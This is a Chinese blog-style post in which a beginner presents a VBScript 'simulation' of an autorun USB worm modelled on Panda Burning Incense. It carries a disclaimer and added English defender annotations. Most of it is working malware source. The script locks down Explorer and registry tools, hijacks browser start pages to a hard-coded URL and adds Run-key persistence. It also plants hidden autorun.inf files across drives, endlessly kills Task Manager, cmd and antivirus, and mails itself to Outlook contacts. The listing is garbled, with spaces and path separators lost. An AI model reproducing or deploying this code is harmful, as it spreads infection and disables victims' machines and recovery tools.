使用过U盘的朋友都知道,U盘病毒是一种Autorun自运行病毒:双击时会触发病毒体,病毒会复制自身到C、D、E等盘符以及系统盘的system32下(生成exe文件和一个Autorun.inf文件),同时修改注册表;在C盘等盘符上点击右键时,会出现一个auto命令(黑色粗体),或者出现两个"开始"命令。本人学习vbs才15天,也来模拟一下这个autorun病毒和熊猫烧香的部分功能;本人能力有限,只能模拟到这个程度。声明:本人模拟这个病毒,完全是为了学习和研究技术,切记不要搞破坏;如果有人用本人代码搞破坏,后果自负。
onerrorresumenext
' NOTE(review): this listing appears to have lost its spaces and path separators in
' extraction (e.g. "dimfso", registry paths without separators). It is kept exactly as
' published and is annotated here for analysis and detection purposes only.
' Declares the script's working variables.
dimfso,wsh,myfile,ws,pp,fsoFolder
' WScript.Shell object: used further down for the registry writes and for launching cmd.
setwsh=wscript.createobject("wscript.shell")
' Scripting.FileSystemObject: used further down for file-existence checks and file creation.
setfso=wscript.createobject("scripting.filesystemobject")
' Handle to the running script file itself; the later copy calls operate on this handle.
setmyfile=fso.GetFile(wscript.scriptfullname)
' Registry changes (Start-menu items and Internet Explorer settings).
' Defender view: everything in this section is a registry value-set issued through
' WScript.Shell.RegWrite. A burst of policy values like these written by a script host
' process is a strong detection signal (e.g. registry value-set telemetry).
' Hidden-file display option: the SHOWALL "CheckedValue" is set to 0.
wsh.Regwrite"HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue",0,"REG_DWORD"
' Internet Explorer "Restrictions" and "Control Panel" policy values, each set to 1 (HKCU).
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerRestrictionsNoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerRestrictionsNoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerRestrictionsNoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerRestrictionsNoFileOpen",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelAdvanced",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelCacheInternet",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelAutoConfig",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelHomePage",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelHistory",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelConnwizAdminLock",1,"REG_DWORD"
' Browser start/search page values are pointed at one hard-coded URL, for the current user
' and for HKEY_USERS .DEFAULT. The hostname is an indicator: look for it in these registry
' values and in proxy/DNS logs.
wsh.Regwrite"HKCUSoftwareMicrosoftInternetExplorerMainStartPage","http://ruanji03.ys168.com"
wsh.Regwrite"HKCUSoftwareMicrosoftInternetExplorerMainSearchPage","http://ruanji03.ys168.com"
wsh.Regwrite"HKCUSoftwareMicrosoftInternetExplorerMainDefault_Page_URL","http://ruanji03.ys168.com"
wsh.Regwrite"HKCUSoftwareMicrosoftInternetExplorerMainDefault_Search_URL","http://ruanji03.ys168.com"
wsh.Regwrite"HKEY_USERS.DEFAULTSoftwareMicrosoftInternetExplorerMainStartPage","http://ruanji03.ys168.com"
wsh.Regwrite"HKEY_USERS.DEFAULTSoftwareMicrosoftInternetExplorerMainDefault_Page_URL","http://ruanji03.ys168.com"
wsh.Regwrite"HKEY_USERS.DEFAULTSoftwareMicrosoftInternetExplorerMainDefault_Search_URL","http://ruanji03.ys168.com"
wsh.Regwrite"HKEY_USERS.DEFAULTSoftwareMicrosoftInternetExplorerMainSearchPage","http://ruanji03.ys168.com"
' More IE policy values set to 1 (the HomePage value repeats an earlier write).
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelHomePage",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelSecurityTab",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelResetWebSettings",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerRestrictionsNoViewSource",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerInfodeliveryRestrictionsNoAddingSubScriptions",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode",1,"REG_DWORD"
' Persistence: a value named "Win32system" is written under the HKLM Run key and names
' NYboy.vbs on C:. Autostart (Run key) auditing should flag a script file registered here.
wsh.Regwrite"HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32system","c:NYboy.vbs"
' The Run value "ScanRegistry" is set to an empty string.
wsh.Regwrite"HKLMSoftwareMicrosoftWindowsCurrentVersionRunScanRegistry",""
' Explorer policy values for the current user, each set to 1 (log off, Run, desktop,
' context menus, shutdown, help, Find, Windows Update, taskbar settings, and others).
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerStartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSMHelp",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoNetHood",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWinKeys",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetFolders",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind","1","REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRecentDocsHistory",1,"REG_DWORD"
' DisableRegistryTools is the policy that blocks Registry Editor for the user. Remediation
' may therefore need policy tooling, another account or an offline hive edit to undo the
' values in this section.
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools","1","REG_DWORD"
wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled",1,"REG_DWORD"
' Stops the user from opening a hard drive by double-click; the author notes that the same
' could be done for folders and does not elaborate.
' What the writes do: the default verb of the Drive and Directory "shell" keys is set to
' "auto", and the "auto" verb's command names NYboy.bat on C:, under both HKCR and
' HKLM SOFTWARE Classes.
' Defender view: cleanup has to restore these shell keys as well as delete the files,
' otherwise opening a drive or folder keeps invoking a command that no longer exists.
wsh.Regwrite"HKLMSOFTWAREClassesDriveshellautocommand","C:NYboy.bat'%1'"
wsh.Regwrite"HKCRDriveshell","auto"
wsh.Regwrite"HKCRDriveshellautocommand","C:NYboy.bat'%1'"
wsh.Regwrite"HKLMSOFTWAREClassesDirectoryshell","auto"
wsh.Regwrite"HKCRDirectoryshellautocommand","C:NYboy.bat'%1'"
wsh.Regwrite"HKLMSOFTWAREClassesDirectoryshellautocommand","C:NYboy.bat'%1'"
' Changes the default file icons (author's note: this could be swapped for a cute panda).
' DefaultIcon for exefile, txtfile, dllfile, batfile and inifile is pointed at 1.ico on C:,
' under both HKCR and HKLM SOFTWARE Classes.
wsh.Regwrite"HKCRexefileDefaultIcon","c:1.ico"
wsh.Regwrite"HKCRtxtfileDefaultIcon","c:1.ico"
wsh.Regwrite"HKCRdllfileDefaultIcon","c:1.ico"
wsh.Regwrite"HKCRbatfileDefaultIcon","c:1.ico"
wsh.Regwrite"HKCRinifileDefaultIcon","c:1.ico"
wsh.Regwrite"HKLMSOFTWAREClassesexefileDefaultIcon","c:1.ico"
wsh.Regwrite"HKLMSOFTWAREClassestxtfileDefaultIcon","c:1.ico"
wsh.Regwrite"HKLMSOFTWAREClassesdllfileDefaultIcon","c:1.ico"
wsh.Regwrite"HKLMSOFTWAREClassesbatfileDefaultIcon","c:1.ico"
wsh.Regwrite"HKLMSOFTWAREClassesinifileDefaultIcon","c:1.ico"
' The .reg extension is associated with "txtfile".
' NOTE(review): presumably so that .reg repair files open as text instead of merging - confirm.
wsh.Regwrite"HKLMSoftwareCLASSES.reg","txtfile"
' Logon notice caption and text are set to fixed strings that announce the infection and
' give a QQ contact number. The strings are left as published; they serve as indicators.
wsh.Regwrite"HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption","你好啊,大兵和你开个小小的玩笑"
wsh.Regwrite"HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText","你已经中毒了,赶快杀毒或者与QQ252287438联系"
' Copies itself to the C, D, E and F drives and to the USB drive (I: in this listing).
' Defender view: a script host copying its own script file to several drive letters in
' quick succession is typical removable-media worm behaviour and worth alerting on.
myfile.copy"c:"
myfile.copy"D:"
myfile.copy"E:"
myfile.copy"F:"
myfile.copy"I:"
' FileSystemObject attribute value 34 = 2 (Hidden) + 32 (Archive), applied to the running
' script file.
myfile.attributes=34
' Defines the content of Autorun.inf; the author notes that this is the part a USB-drive
' virus requires and that it is kept simple here.
' The same pattern is repeated for C:, D:, E:, F: and I:
'   - if autorun.inf already exists on the drive, the script only obtains a handle to it;
'   - otherwise cmd is launched to append an [AutoRun] section whose open, shellexecute
'     and shell "Auto" entries all name NYboy.bat, and to mark the file hidden, system and
'     read-only; a NYboy.bat containing the single line "NYboy.vbs" is then created.
' Defender view: a hidden+system autorun.inf in a drive root that references a .bat or
' .vbs file is a reliable indicator. Windows 7 and later do not honour AutoRun commands
' on non-optical removable media, and the NoDriveTypeAutoRun policy disables AutoRun per
' drive type on older systems.
Iffso.FileExists("C:autorun.inf")Then
SetobjFolder=fso.GetFile("C:autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>C:autorun.inf"_
&"&&echoopen=NYboy.bat>>C:autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>C:autorun.inf"_
&"&&echoshellAutocommand=NYboy.bat>>C:autorun.inf"_
&"&&echoshell=Auto>>C:autorun.inf"_
&"&&attrib+h+s+rC:autorun.inf"
setautobatc=fso.createtextfile("c:NYboy.bat",1,ture)
autobatc.writeline("NYboy.vbs")
EndIf
' Same steps for D:.
Iffso.FileExists("D:autorun.inf")Then
SetobjFolder=fso.GetFile("D:autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>D:autorun.inf"_
&"&&echoopen=NYboy.bat>>D:autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>D:autorun.inf"_
&"&&echoshellAutocommand=NYboy.bat>>D:autorun.inf"_
&"&&echoshell=Auto>>D:autorun.inf"_
&"&&attrib+h+s+rD:autorun.inf"
setautobatd=fso.createtextfile("D:NYboy.bat",1,ture)
autobatd.writeline("NYboy.vbs")
EndIf
' Same steps for E:.
Iffso.FileExists("E:autorun.inf")Then
SetobjFolder=fso.GetFile("E:autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>E:autorun.inf"_
&"&&echoopen=NYboy.bat>>E:autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>E:autorun.inf"_
&"&&echoshellAutocommand=NYboy.bat>>E:autorun.inf"_
&"&&echoshell=Auto>>E:autorun.inf"_
&"&&attrib+h+s+rE:autorun.inf"
setautobate=fso.createtextfile("E:NYboy.bat",1,ture)
autobate.writeline("NYboy.vbs")
EndIf
' Same steps for F:.
Iffso.FileExists("F:autorun.inf")Then
SetobjFolder=fso.GetFile("F:autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>F:autorun.inf"_
&"&&echoopen=NYboy.bat>>F:autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>F:autorun.inf"_
&"&&echoshellAutocommand=NYboy.bat>>F:autorun.inf"_
&"&&echoshell=Auto>>F:autorun.inf"_
&"&&attrib+h+s+rF:autorun.inf"
setautobatf=fso.createtextfile("F:NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
EndIf
' Same steps for I: (the variable name autobatf is reused from the F: block).
Iffso.FileExists("I:autorun.inf")Then
SetobjFolder=fso.GetFile("I:autorun.inf")
Else
wsh.run"cmd/cecho[AutoRun]>>I:autorun.inf"_
&"&&echoopen=NYboy.bat>>I:autorun.inf"_
&"&&echoshellexecute=NYboy.bat>>I:autorun.inf"_
&"&&echoshellAutocommand=NYboy.bat>>I:autorun.inf"_
&"&&echoshell=Auto>>I:autorun.inf"_
&"&&attrib+h+s+rI:autorun.inf"
setautobatf=fso.createtextfile("I:NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
EndIf
' Sets the virus body's attributes to system, read-only and hidden.
' One cmd invocation chains attrib +h +s +r over NYboy.bat on C:, D:, E:, F: and I:.
' Defender view: a script host spawning cmd to run attrib with +h +s +r against files in
' drive roots is a useful process-creation detection; such files stay invisible in
' Explorer unless protected operating-system files are shown.
wsh.run"cmd/cattrib+h+s+rC:NYboy.bat"_
&"&&attrib+h+s+rD:NYboy.bat"_
&"&&attrib+h+s+rE:NYboy.bat"_
&"&&attrib+h+s+rF:NYboy.bat"_
&"&&attrib+h+s+rI:NYboy.bat"
' Forcibly ends certain processes - the author lists QQ, Notepad, web pages, batch files,
' Kaspersky, realplay and others - so that they cannot be opened after the script runs.
' The loop has no exit condition: each pass connects to WMI, queries Win32_Process for a
' fixed list of image names, terminates every match and sleeps 100 ms between matches.
' Defender view: the list includes taskmgr.exe, cmd.exe and avp.exe, i.e. tools a user or
' responder would reach for. Repeated WMI Terminate calls against these names from a
' script host are a detection point, and the script host process has to be stopped first
' before the listed tools can stay open.
do
setws=getobject("winmgmts:.rootcimv2")
setpp=ws.execquery("select*fromwin32_processwherename='taskmgr.exe'orName='QQ.exe'orName='notepad.exe'orName='IEXPLORE.exe'orName='cmd.exe'orName='avp.exe'orName='winRAR.exe'orName='realplay.exe'orName='WINWORD.exe'")
foreachiinpp
i.terminate()
wscript.sleep100
next
loop
' Lets the virus spread by e-mail.
' Automates Outlook: for x = 1 to 5 it creates a mail item, addresses it to entry x of the
' first MAPI address list, sets a fixed subject and body, attaches NYboy.vbs from C: and
' sends it; Outlook is then told to quit.
' Defender view: the fixed subject/body strings and the .vbs attachment name are
' indicators for mail-gateway rules. Blocking script attachments at the gateway and
' keeping Outlook's programmatic-access prompt enabled are the relevant controls.
Setol=CreateObject("Outlook.Application")
' Errors in the statements that follow are ignored rather than raised.
OnErrorResumeNext
Forx=1To5
SetMail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="今晚你来吗?"
Mail.Body="朋友你好:您的朋友给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运!QQ交友频道"
Mail.Attachments.Add("c:NYboy.vbs")
Mail.Send
Next
ol.Quit